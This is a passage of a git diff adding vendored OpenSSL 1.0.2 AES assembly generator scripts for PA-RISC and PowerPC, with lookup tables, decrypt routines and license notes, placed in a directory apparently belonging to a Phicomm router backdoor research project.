+	.WORD	0x038c8c8f, 0x59a1a1f8, 0x09898980, 0x1a0d0d17
+	.WORD	0x65bfbfda, 0xd7e6e631, 0x844242c6, 0xd06868b8
+	.WORD	0x824141c3, 0x299999b0, 0x5a2d2d77, 0x1e0f0f11
+	.WORD	0x7bb0b0cb, 0xa85454fc, 0x6dbbbbd6, 0x2c16163a
+	.BYTE	0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5
+	.BYTE	0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76
+	.BYTE	0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0
+	.BYTE	0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0
+	.BYTE	0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc
+	.BYTE	0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15
+	.BYTE	0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a
+	.BYTE	0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75
+	.BYTE	0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0
+	.BYTE	0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84
+	.BYTE	0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b
+	.BYTE	0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf
+	.BYTE	0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85
+	.BYTE	0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8
+	.BYTE	0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5
+	.BYTE	0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2
+	.BYTE	0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17
+	.BYTE	0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73
+	.BYTE	0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88
+	.BYTE	0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb
+	.BYTE	0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c
+	.BYTE	0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79
+	.BYTE	0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9
+	.BYTE	0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08
+	.BYTE	0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6
+	.BYTE	0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a
+	.BYTE	0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e
+	.BYTE	0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e
+	.BYTE	0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94
+	.BYTE	0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf
+	.BYTE	0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68
+	.BYTE	0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16
+___
+
+$code.=<<___;
+	.EXPORT	AES_decrypt,ENTRY,ARGW0=GR,ARGW1=GR,ARGW2=GR
+	.ALIGN	16
+AES_decrypt
+	.PROC
+	.CALLINFO	FRAME=`$FRAME-16*$SIZE_T`,NO_CALLS,SAVE_RP,ENTRY_GR=18
+	.ENTRY
+	$PUSH	%r2,-$SAVED_RP(%sp)	; standard prologue
+	$PUSHMA	%r3,$FRAME(%sp)
+	$PUSH	%r4,`-$FRAME+1*$SIZE_T`(%sp)
+	$PUSH	%r5,`-$FRAME+2*$SIZE_T`(%sp)
+	$PUSH	%r6,`-$FRAME+3*$SIZE_T`(%sp)
+	$PUSH	%r7,`-$FRAME+4*$SIZE_T`(%sp)
+	$PUSH	%r8,`-$FRAME+5*$SIZE_T`(%sp)
+	$PUSH	%r9,`-$FRAME+6*$SIZE_T`(%sp)
+	$PUSH	%r10,`-$FRAME+7*$SIZE_T`(%sp)
+	$PUSH	%r11,`-$FRAME+8*$SIZE_T`(%sp)
+	$PUSH	%r12,`-$FRAME+9*$SIZE_T`(%sp)
+	$PUSH	%r13,`-$FRAME+10*$SIZE_T`(%sp)
+	$PUSH	%r14,`-$FRAME+11*$SIZE_T`(%sp)
+	$PUSH	%r15,`-$FRAME+12*$SIZE_T`(%sp)
+	$PUSH	%r16,`-$FRAME+13*$SIZE_T`(%sp)
+	$PUSH	%r17,`-$FRAME+14*$SIZE_T`(%sp)
+	$PUSH	%r18,`-$FRAME+15*$SIZE_T`(%sp)
+
+	blr	%r0,$tbl
+	ldi	3,$t0
+L\$dec_pic
+	andcm	$tbl,$t0,$tbl
+	ldo	L\$AES_Td-L\$dec_pic($tbl),$tbl
+
+	and	$inp,$t0,$t0
+	sub	$inp,$t0,$inp
+	ldw	0($inp),$s0
+	ldw	4($inp),$s1
+	ldw	8($inp),$s2
+	comib,=	0,$t0,L\$dec_inp_aligned
+	ldw	12($inp),$s3
+
+	sh3addl	$t0,%r0,$t0
+	subi	32,$t0,$t0
+	mtctl	$t0,%cr11
+	ldw	16($inp),$t1
+	vshd	$s0,$s1,$s0
+	vshd	$s1,$s2,$s1
+	vshd	$s2,$s3,$s2
+	vshd	$s3,$t1,$s3
+
+L\$dec_inp_aligned
+	bl	_parisc_AES_decrypt,%r31
+	nop
+
+	extru,<> $out,31,2,%r0
+	b	L\$dec_out_aligned
+	nop
+
+	_srm	$s0,24,$acc0
+	_srm	$s0,16,$acc1
+	stb	$acc0,0($out)
+	_srm	$s0,8,$acc2
+	stb	$acc1,1($out)
+	_srm	$s1,24,$acc4
+	stb	$acc2,2($out)
+	_srm	$s1,16,$acc5
+	stb	$s0,3($out)
+	_srm	$s1,8,$acc6
+	stb	$acc4,4($out)
+	_srm	$s2,24,$acc0
+	stb	$acc5,5($out)
+	_srm	$s2,16,$acc1
+	stb	$acc6,6($out)
+	_srm	$s2,8,$acc2
+	stb	$s1,7($out)
+	_srm	$s3,24,$acc4
+	stb	$acc0,8($out)
+	_srm	$s3,16,$acc5
+	stb	$acc1,9($out)
+	_srm	$s3,8,$acc6
+	stb	$acc2,10($out)
+	stb	$s2,11($out)
+	stb	$acc4,12($out)
+	stb	$acc5,13($out)
+	stb	$acc6,14($out)
+	b	L\$dec_done
+	stb	$s3,15($out)
+
+L\$dec_out_aligned
+	stw	$s0,0($out)
+	stw	$s1,4($out)
+	stw	$s2,8($out)
+	stw	$s3,12($out)
+
+L\$dec_done
+	$POP	`-$FRAME-$SAVED_RP`(%sp),%r2	; standard epilogue
+	$POP	`-$FRAME+1*$SIZE_T`(%sp),%r4
+	$POP	`-$FRAME+2*$SIZE_T`(%sp),%r5
+	$POP	`-$FRAME+3*$SIZE_T`(%sp),%r6
+	$POP	`-$FRAME+4*$SIZE_T`(%sp),%r7
+	$POP	`-$FRAME+5*$SIZE_T`(%sp),%r8
+	$POP	`-$FRAME+6*$SIZE_T`(%sp),%r9
+	$POP	`-$FRAME+7*$SIZE_T`(%sp),%r10
+	$POP	`-$FRAME+8*$SIZE_T`(%sp),%r11
+	$POP	`-$FRAME+9*$SIZE_T`(%sp),%r12
+	$POP	`-$FRAME+10*$SIZE_T`(%sp),%r13
+	$POP	`-$FRAME+11*$SIZE_T`(%sp),%r14
+	$POP	`-$FRAME+12*$SIZE_T`(%sp),%r15
+	$POP	`-$FRAME+13*$SIZE_T`(%sp),%r16
+	$POP	`-$FRAME+14*$SIZE_T`(%sp),%r17
+	$POP	`-$FRAME+15*$SIZE_T`(%sp),%r18
+	bv	(%r2)
+	.EXIT
+	$POPMB	-$FRAME(%sp),%r3
+	.PROCEND
+
+	.ALIGN	16
+_parisc_AES_decrypt
+	.PROC
+	.CALLINFO	MILLICODE
+	.ENTRY
+	ldw	240($key),$rounds
+	ldw	0($key),$t0
+	ldw	4($key),$t1
+	ldw	8($key),$t2
+	ldw	12($key),$t3
+	_srm	$rounds,1,$rounds
+	xor	$t0,$s0,$s0
+	ldw	16($key),$t0
+	xor	$t1,$s1,$s1
+	ldw	20($key),$t1
+	_srm	$s0,24,$acc0
+	xor	$t2,$s2,$s2
+	ldw	24($key),$t2
+	xor	$t3,$s3,$s3
+	ldw	28($key),$t3
+	_srm	$s3,16,$acc1
+L\$dec_loop
+	_srm	$s2,8,$acc2
+	ldwx,s	$acc0($tbl),$acc0
+	_srm	$s1,0,$acc3
+	ldwx,s	$acc1($tbl),$acc1
+	_srm	$s1,24,$acc4
+	ldwx,s	$acc2($tbl),$acc2
+	_srm	$s0,16,$acc5
+	ldwx,s	$acc3($tbl),$acc3
+	_srm	$s3,8,$acc6
+	ldwx,s	$acc4($tbl),$acc4
+	_srm	$s2,0,$acc7
+	ldwx,s	$acc5($tbl),$acc5
+	_srm	$s2,24,$acc8
+	ldwx,s	$acc6($tbl),$acc6
+	_srm	$s1,16,$acc9
+	ldwx,s	$acc7($tbl),$acc7
+	_srm	$s0,8,$acc10
+	ldwx,s	$acc8($tbl),$acc8
+	_srm	$s3,0,$acc11
+	ldwx,s	$acc9($tbl),$acc9
+	_srm	$s3,24,$acc12
+	ldwx,s	$acc10($tbl),$acc10
+	_srm	$s2,16,$acc13
+	ldwx,s	$acc11($tbl),$acc11
+	_srm	$s1,8,$acc14
+	ldwx,s	$acc12($tbl),$acc12
+	_srm	$s0,0,$acc15
+	ldwx,s	$acc13($tbl),$acc13
+	ldwx,s	$acc14($tbl),$acc14
+	ldwx,s	$acc15($tbl),$acc15
+	addib,= -1,$rounds,L\$dec_last
+	ldo	32($key),$key
+
+		_ror	$acc1,8,$acc1
+		xor	$acc0,$t0,$t0
+	ldw	0($key),$s0
+		_ror	$acc2,16,$acc2
+		xor	$acc1,$t0,$t0
+	ldw	4($key),$s1
+		_ror	$acc3,24,$acc3
+		xor	$acc2,$t0,$t0
+	ldw	8($key),$s2
+		_ror	$acc5,8,$acc5
+		xor	$acc3,$t0,$t0
+	ldw	12($key),$s3
+		_ror	$acc6,16,$acc6
+		xor	$acc4,$t1,$t1
+		_ror	$acc7,24,$acc7
+		xor	$acc5,$t1,$t1
+		_ror	$acc9,8,$acc9
+		xor	$acc6,$t1,$t1
+		_ror	$acc10,16,$acc10
+		xor	$acc7,$t1,$t1
+		_ror	$acc11,24,$acc11
+		xor	$acc8,$t2,$t2
+		_ror	$acc13,8,$acc13
+		xor	$acc9,$t2,$t2
+		_ror	$acc14,16,$acc14
+		xor	$acc10,$t2,$t2
+		_ror	$acc15,24,$acc15
+		xor	$acc11,$t2,$t2
+		xor	$acc12,$acc14,$acc14
+		xor	$acc13,$t3,$t3
+	_srm	$t0,24,$acc0
+		xor	$acc14,$t3,$t3
+		xor	$acc15,$t3,$t3
+	_srm	$t3,16,$acc1
+
+	_srm	$t2,8,$acc2
+	ldwx,s	$acc0($tbl),$acc0
+	_srm	$t1,0,$acc3
+	ldwx,s	$acc1($tbl),$acc1
+	_srm	$t1,24,$acc4
+	ldwx,s	$acc2($tbl),$acc2
+	_srm	$t0,16,$acc5
+	ldwx,s	$acc3($tbl),$acc3
+	_srm	$t3,8,$acc6
+	ldwx,s	$acc4($tbl),$acc4
+	_srm	$t2,0,$acc7
+	ldwx,s	$acc5($tbl),$acc5
+	_srm	$t2,24,$acc8
+	ldwx,s	$acc6($tbl),$acc6
+	_srm	$t1,16,$acc9
+	ldwx,s	$acc7($tbl),$acc7
+	_srm	$t0,8,$acc10
+	ldwx,s	$acc8($tbl),$acc8
+	_srm	$t3,0,$acc11
+	ldwx,s	$acc9($tbl),$acc9
+	_srm	$t3,24,$acc12
+	ldwx,s	$acc10($tbl),$acc10
+	_srm	$t2,16,$acc13
+	ldwx,s	$acc11($tbl),$acc11
+	_srm	$t1,8,$acc14
+	ldwx,s	$acc12($tbl),$acc12
+	_srm	$t0,0,$acc15
+	ldwx,s	$acc13($tbl),$acc13
+		_ror	$acc1,8,$acc1
+	ldwx,s	$acc14($tbl),$acc14
+
+		_ror	$acc2,16,$acc2
+		xor	$acc0,$s0,$s0
+	ldwx,s	$acc15($tbl),$acc15
+		_ror	$acc3,24,$acc3
+		xor	$acc1,$s0,$s0
+	ldw	16($key),$t0
+		_ror	$acc5,8,$acc5
+		xor	$acc2,$s0,$s0
+	ldw	20($key),$t1
+		_ror	$acc6,16,$acc6
+		xor	$acc3,$s0,$s0
+	ldw	24($key),$t2
+		_ror	$acc7,24,$acc7
+		xor	$acc4,$s1,$s1
+	ldw	28($key),$t3
+		_ror	$acc9,8,$acc9
+		xor	$acc5,$s1,$s1
+	ldw	1024+0($tbl),%r0		; prefetch td4
+		_ror	$acc10,16,$acc10
+		xor	$acc6,$s1,$s1
+	ldw	1024+32($tbl),%r0		; prefetch td4
+		_ror	$acc11,24,$acc11
+		xor	$acc7,$s1,$s1
+	ldw	1024+64($tbl),%r0		; prefetch td4
+		_ror	$acc13,8,$acc13
+		xor	$acc8,$s2,$s2
+	ldw	1024+96($tbl),%r0		; prefetch td4
+		_ror	$acc14,16,$acc14
+		xor	$acc9,$s2,$s2
+	ldw	1024+128($tbl),%r0		; prefetch td4
+		_ror	$acc15,24,$acc15
+		xor	$acc10,$s2,$s2
+	ldw	1024+160($tbl),%r0		; prefetch td4
+	_srm	$s0,24,$acc0
+		xor	$acc11,$s2,$s2
+	ldw	1024+192($tbl),%r0		; prefetch td4
+		xor	$acc12,$acc14,$acc14
+		xor	$acc13,$s3,$s3
+	ldw	1024+224($tbl),%r0		; prefetch td4
+		xor	$acc14,$s3,$s3
+		xor	$acc15,$s3,$s3
+	b	L\$dec_loop
+	_srm	$s3,16,$acc1
+
+	.ALIGN	16
+L\$dec_last
+	ldo	1024($tbl),$rounds
+		_ror	$acc1,8,$acc1
+		xor	$acc0,$t0,$t0
+	ldw	0($key),$s0
+		_ror	$acc2,16,$acc2
+		xor	$acc1,$t0,$t0
+	ldw	4($key),$s1
+		_ror	$acc3,24,$acc3
+		xor	$acc2,$t0,$t0
+	ldw	8($key),$s2
+		_ror	$acc5,8,$acc5
+		xor	$acc3,$t0,$t0
+	ldw	12($key),$s3
+		_ror	$acc6,16,$acc6
+		xor	$acc4,$t1,$t1
+		_ror	$acc7,24,$acc7
+		xor	$acc5,$t1,$t1
+		_ror	$acc9,8,$acc9
+		xor	$acc6,$t1,$t1
+		_ror	$acc10,16,$acc10
+		xor	$acc7,$t1,$t1
+		_ror	$acc11,24,$acc11
+		xor	$acc8,$t2,$t2
+		_ror	$acc13,8,$acc13
+		xor	$acc9,$t2,$t2
+		_ror	$acc14,16,$acc14
+		xor	$acc10,$t2,$t2
+		_ror	$acc15,24,$acc15
+		xor	$acc11,$t2,$t2
+		xor	$acc12,$acc14,$acc14
+		xor	$acc13,$t3,$t3
+	_srm	$t0,24,$acc0
+		xor	$acc14,$t3,$t3
+		xor	$acc15,$t3,$t3
+	_srm	$t3,16,$acc1
+
+	_srm	$t2,8,$acc2
+	ldbx	$acc0($rounds),$acc0
+	_srm	$t1,24,$acc4
+	ldbx	$acc1($rounds),$acc1
+	_srm	$t0,16,$acc5
+	_srm	$t1,0,$acc3
+	ldbx	$acc2($rounds),$acc2
+	ldbx	$acc3($rounds),$acc3
+	_srm	$t3,8,$acc6
+	ldbx	$acc4($rounds),$acc4
+	_srm	$t2,24,$acc8
+	ldbx	$acc5($rounds),$acc5
+	_srm	$t1,16,$acc9
+	_srm	$t2,0,$acc7
+	ldbx	$acc6($rounds),$acc6
+	ldbx	$acc7($rounds),$acc7
+	_srm	$t0,8,$acc10
+	ldbx	$acc8($rounds),$acc8
+	_srm	$t3,24,$acc12
+	ldbx	$acc9($rounds),$acc9
+	_srm	$t2,16,$acc13
+	_srm	$t3,0,$acc11
+	ldbx	$acc10($rounds),$acc10
+	_srm	$t1,8,$acc14
+	ldbx	$acc11($rounds),$acc11
+	ldbx	$acc12($rounds),$acc12
+	ldbx	$acc13($rounds),$acc13
+	_srm	$t0,0,$acc15
+	ldbx	$acc14($rounds),$acc14
+
+		dep	$acc0,7,8,$acc3
+	ldbx	$acc15($rounds),$acc15
+		dep	$acc4,7,8,$acc7
+		dep	$acc1,15,8,$acc3
+		dep	$acc5,15,8,$acc7
+		dep	$acc2,23,8,$acc3
+		dep	$acc6,23,8,$acc7
+		xor	$acc3,$s0,$s0
+		xor	$acc7,$s1,$s1
+		dep	$acc8,7,8,$acc11
+		dep	$acc12,7,8,$acc15
+		dep	$acc9,15,8,$acc11
+		dep	$acc13,15,8,$acc15
+		dep	$acc10,23,8,$acc11
+		dep	$acc14,23,8,$acc15
+		xor	$acc11,$s2,$s2
+
+	bv	(%r31)
+	.EXIT
+		xor	$acc15,$s3,$s3
+	.PROCEND
+
+	.ALIGN	64
+L\$AES_Td
+	.WORD	0x51f4a750, 0x7e416553, 0x1a17a4c3, 0x3a275e96
+	.WORD	0x3bab6bcb, 0x1f9d45f1, 0xacfa58ab, 0x4be30393
+	.WORD	0x2030fa55, 0xad766df6, 0x88cc7691, 0xf5024c25
+	.WORD	0x4fe5d7fc, 0xc52acbd7, 0x26354480, 0xb562a38f
+	.WORD	0xdeb15a49, 0x25ba1b67, 0x45ea0e98, 0x5dfec0e1
+	.WORD	0xc32f7502, 0x814cf012, 0x8d4697a3, 0x6bd3f9c6
+	.WORD	0x038f5fe7, 0x15929c95, 0xbf6d7aeb, 0x955259da
+	.WORD	0xd4be832d, 0x587421d3, 0x49e06929, 0x8ec9c844
+	.WORD	0x75c2896a, 0xf48e7978, 0x99583e6b, 0x27b971dd
+	.WORD	0xbee14fb6, 0xf088ad17, 0xc920ac66, 0x7dce3ab4
+	.WORD	0x63df4a18, 0xe51a3182, 0x97513360, 0x62537f45
+	.WORD	0xb16477e0, 0xbb6bae84, 0xfe81a01c, 0xf9082b94
+	.WORD	0x70486858, 0x8f45fd19, 0x94de6c87, 0x527bf8b7
+	.WORD	0xab73d323, 0x724b02e2, 0xe31f8f57, 0x6655ab2a
+	.WORD	0xb2eb2807, 0x2fb5c203, 0x86c57b9a, 0xd33708a5
+	.WORD	0x302887f2, 0x23bfa5b2, 0x02036aba, 0xed16825c
+	.WORD	0x8acf1c2b, 0xa779b492, 0xf307f2f0, 0x4e69e2a1
+	.WORD	0x65daf4cd, 0x0605bed5, 0xd134621f, 0xc4a6fe8a
+	.WORD	0x342e539d, 0xa2f355a0, 0x058ae132, 0xa4f6eb75
+	.WORD	0x0b83ec39, 0x4060efaa, 0x5e719f06, 0xbd6e1051
+	.WORD	0x3e218af9, 0x96dd063d, 0xdd3e05ae, 0x4de6bd46
+	.WORD	0x91548db5, 0x71c45d05, 0x0406d46f, 0x605015ff
+	.WORD	0x1998fb24, 0xd6bde997, 0x894043cc, 0x67d99e77
+	.WORD	0xb0e842bd, 0x07898b88, 0xe7195b38, 0x79c8eedb
+	.WORD	0xa17c0a47, 0x7c420fe9, 0xf8841ec9, 0x00000000
+	.WORD	0x09808683, 0x322bed48, 0x1e1170ac, 0x6c5a724e
+	.WORD	0xfd0efffb, 0x0f853856, 0x3daed51e, 0x362d3927
+	.WORD	0x0a0fd964, 0x685ca621, 0x9b5b54d1, 0x24362e3a
+	.WORD	0x0c0a67b1, 0x9357e70f, 0xb4ee96d2, 0x1b9b919e
+	.WORD	0x80c0c54f, 0x61dc20a2, 0x5a774b69, 0x1c121a16
+	.WORD	0xe293ba0a, 0xc0a02ae5, 0x3c22e043, 0x121b171d
+	.WORD	0x0e090d0b, 0xf28bc7ad, 0x2db6a8b9, 0x141ea9c8
+	.WORD	0x57f11985, 0xaf75074c, 0xee99ddbb, 0xa37f60fd
+	.WORD	0xf701269f, 0x5c72f5bc, 0x44663bc5, 0x5bfb7e34
+	.WORD	0x8b432976, 0xcb23c6dc, 0xb6edfc68, 0xb8e4f163
+	.WORD	0xd731dcca, 0x42638510, 0x13972240, 0x84c61120
+	.WORD	0x854a247d, 0xd2bb3df8, 0xaef93211, 0xc729a16d
+	.WORD	0x1d9e2f4b, 0xdcb230f3, 0x0d8652ec, 0x77c1e3d0
+	.WORD	0x2bb3166c, 0xa970b999, 0x119448fa, 0x47e96422
+	.WORD	0xa8fc8cc4, 0xa0f03f1a, 0x567d2cd8, 0x223390ef
+	.WORD	0x87494ec7, 0xd938d1c1, 0x8ccaa2fe, 0x98d40b36
+	.WORD	0xa6f581cf, 0xa57ade28, 0xdab78e26, 0x3fadbfa4
+	.WORD	0x2c3a9de4, 0x5078920d, 0x6a5fcc9b, 0x547e4662
+	.WORD	0xf68d13c2, 0x90d8b8e8, 0x2e39f75e, 0x82c3aff5
+	.WORD	0x9f5d80be, 0x69d0937c, 0x6fd52da9, 0xcf2512b3
+	.WORD	0xc8ac993b, 0x10187da7, 0xe89c636e, 0xdb3bbb7b
+	.WORD	0xcd267809, 0x6e5918f4, 0xec9ab701, 0x834f9aa8
+	.WORD	0xe6956e65, 0xaaffe67e, 0x21bccf08, 0xef15e8e6
+	.WORD	0xbae79bd9, 0x4a6f36ce, 0xea9f09d4, 0x29b07cd6
+	.WORD	0x31a4b2af, 0x2a3f2331, 0xc6a59430, 0x35a266c0
+	.WORD	0x744ebc37, 0xfc82caa6, 0xe090d0b0, 0x33a7d815
+	.WORD	0xf104984a, 0x41ecdaf7, 0x7fcd500e, 0x1791f62f
+	.WORD	0x764dd68d, 0x43efb04d, 0xccaa4d54, 0xe49604df
+	.WORD	0x9ed1b5e3, 0x4c6a881b, 0xc12c1fb8, 0x4665517f
+	.WORD	0x9d5eea04, 0x018c355d, 0xfa877473, 0xfb0b412e
+	.WORD	0xb3671d5a, 0x92dbd252, 0xe9105633, 0x6dd64713
+	.WORD	0x9ad7618c, 0x37a10c7a, 0x59f8148e, 0xeb133c89
+	.WORD	0xcea927ee, 0xb761c935, 0xe11ce5ed, 0x7a47b13c
+	.WORD	0x9cd2df59, 0x55f2733f, 0x1814ce79, 0x73c737bf
+	.WORD	0x53f7cdea, 0x5ffdaa5b, 0xdf3d6f14, 0x7844db86
+	.WORD	0xcaaff381, 0xb968c43e, 0x3824342c, 0xc2a3405f
+	.WORD	0x161dc372, 0xbce2250c, 0x283c498b, 0xff0d9541
+	.WORD	0x39a80171, 0x080cb3de, 0xd8b4e49c, 0x6456c190
+	.WORD	0x7bcb8461, 0xd532b670, 0x486c5c74, 0xd0b85742
+	.BYTE	0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38
+	.BYTE	0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb
+	.BYTE	0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87
+	.BYTE	0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb
+	.BYTE	0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d
+	.BYTE	0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e
+	.BYTE	0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2
+	.BYTE	0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25
+	.BYTE	0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16
+	.BYTE	0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92
+	.BYTE	0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda
+	.BYTE	0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84
+	.BYTE	0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a
+	.BYTE	0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06
+	.BYTE	0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02
+	.BYTE	0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b
+	.BYTE	0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea
+	.BYTE	0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73
+	.BYTE	0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85
+	.BYTE	0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e
+	.BYTE	0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89
+	.BYTE	0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b
+	.BYTE	0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20
+	.BYTE	0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4
+	.BYTE	0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31
+	.BYTE	0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f
+	.BYTE	0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d
+	.BYTE	0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef
+	.BYTE	0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0
+	.BYTE	0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61
+	.BYTE	0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26
+	.BYTE	0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d
+	.STRINGZ "AES for PA-RISC, CRYPTOGAMS by <appro\@openssl.org>"
+___
+
+foreach (split("\n",$code)) {
+	s/\`([^\`]*)\`/eval $1/ge;
+
+	# translate made up instructons: _ror, _srm
+	s/_ror(\s+)(%r[0-9]+),/shd$1$2,$2,/				or
+
+	s/_srm(\s+%r[0-9]+),([0-9]+),/
+		$SIZE_T==4 ? sprintf("extru%s,%d,8,",$1,31-$2)
+		:            sprintf("extrd,u%s,%d,8,",$1,63-$2)/e;
+
+	s/,\*/,/			if ($SIZE_T==4);
+	s/\bbv\b(.*\(%r2\))/bve$1/	if ($SIZE_T==8);
+	print $_,"\n";
+}
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-ppc.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-ppc.pl
new file mode 100644
index 0000000..7a99fc3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-ppc.pl
@@ -0,0 +1,1452 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# Needs more work: key setup, CBC routine...
+#
+# ppc_AES_[en|de]crypt perform at 18 cycles per byte processed with
+# 128-bit key, which is ~40% better than 64-bit code generated by gcc
+# 4.0. But these are not the ones currently used! Their "compact"
+# counterparts are, for security reason. ppc_AES_encrypt_compact runs
+# at 1/2 of ppc_AES_encrypt speed, while ppc_AES_decrypt_compact -
+# at 1/3 of ppc_AES_decrypt.
+
+# February 2010
+#
+# Rescheduling instructions to favour Power6 pipeline gave 10%
+# performance improvement on the platfrom in question (and marginal
+# improvement even on others). It should be noted that Power6 fails
+# to process byte in 18 cycles, only in 23, because it fails to issue
+# 4 load instructions in two cycles, only in 3. As result non-compact
+# block subroutines are 25% slower than one would expect. Compact
+# functions scale better, because they have pure computational part,
+# which scales perfectly with clock frequency. To be specific
+# ppc_AES_encrypt_compact operates at 42 cycles per byte, while
+# ppc_AES_decrypt_compact - at 55 (in 64-bit build).
+
+$flavour = shift;
+
+if ($flavour =~ /64/) {
+	$SIZE_T	=8;
+	$LRSAVE	=2*$SIZE_T;
+	$STU	="stdu";
+	$POP	="ld";
+	$PUSH	="std";
+} elsif ($flavour =~ /32/) {
+	$SIZE_T	=4;
+	$LRSAVE	=$SIZE_T;
+	$STU	="stwu";
+	$POP	="lwz";
+	$PUSH	="stw";
+} else { die "nonsense $flavour"; }
+
+$LITTLE_ENDIAN = ($flavour=~/le$/) ? $SIZE_T : 0;
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}ppc-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/ppc-xlate.pl" and -f $xlate) or
+die "can't locate ppc-xlate.pl";
+
+open STDOUT,"| $^X $xlate $flavour ".shift || die "can't call $xlate: $!";
+
+$FRAME=32*$SIZE_T;
+
+sub _data_word()
+{ my $i;
+    while(defined($i=shift)) { $code.=sprintf"\t.long\t0x%08x,0x%08x\n",$i,$i; }
+}
+
+$sp="r1";
+$toc="r2";
+$inp="r3";
+$out="r4";
+$key="r5";
+
+$Tbl0="r3";
+$Tbl1="r6";
+$Tbl2="r7";
+$Tbl3=$out;	# stay away from "r2"; $out is offloaded to stack
+
+$s0="r8";
+$s1="r9";
+$s2="r10";
+$s3="r11";
+
+$t0="r12";
